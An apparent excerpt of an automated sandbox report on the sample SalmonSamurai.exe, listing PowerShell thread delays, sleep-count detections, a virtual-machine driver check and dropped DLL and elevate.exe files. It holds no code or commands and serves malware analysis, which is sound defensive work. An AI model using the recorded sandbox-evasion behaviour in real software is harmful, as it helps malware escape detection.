Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeFile opened / queried: C:\Windows\System32\DriverStore\FileRepository\vmci.inf_amd64_68ed49469341f563Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5580Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6064
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4537
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 650
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 495
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 983
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2531
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 564
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 567
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 846
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 769
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7428
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1422
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6735
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2876
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1530
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1088
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1459
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1450
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 880
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1737
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 930
Source: C:\Users\user\Desktop\SalmonSamurai.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\NsisExtracted\resources\elevate.exeJump to dropped file
Source: C:\Users\user\Desktop\SalmonSamurai.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\NsisExtracted\libGLESv2.dllJump to dropped file
Source: C:\Users\user\Desktop\SalmonSamurai.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\NsisExtracted\vulkan-1.dllJump to dropped file
Source: C:\Users\user\Desktop\SalmonSamurai.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\NsisExtracted\libEGL.dllJump to dropped file
Source: C:\Users\user\Desktop\SalmonSamurai.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\NsisExtracted\d3dcompiler_47.dllJump to dropped file
Source: C:\Users\user\Desktop\SalmonSamurai.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\NsisExtracted\vk_swiftshader.dllJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1432Thread sleep count: 5580 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1432Thread sleep count: 213 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6480Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7108Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3512Thread sleep count: 6064 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2692Thread sleep count: 339 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7068Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3064Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5808Thread sleep count: 4537 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5956Thread sleep count: 237 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7044Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4420Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2304Thread sleep count: 650 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6380Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6832Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4520Thread sleep count: 495 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5376Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5964Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7108Thread sleep count: 983 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4324Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5472Thread sleep count: 168 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2368Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3608Thread sleep count: 2531 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5428Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3512Thread sleep count: 564 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6480Thread sleep count: 567 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6528Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3864Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6964Thread sleep count: 846 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1276Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6016Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7032Thread sleep count: 769 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4564Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4124Thread sleep count: 7428 > 30
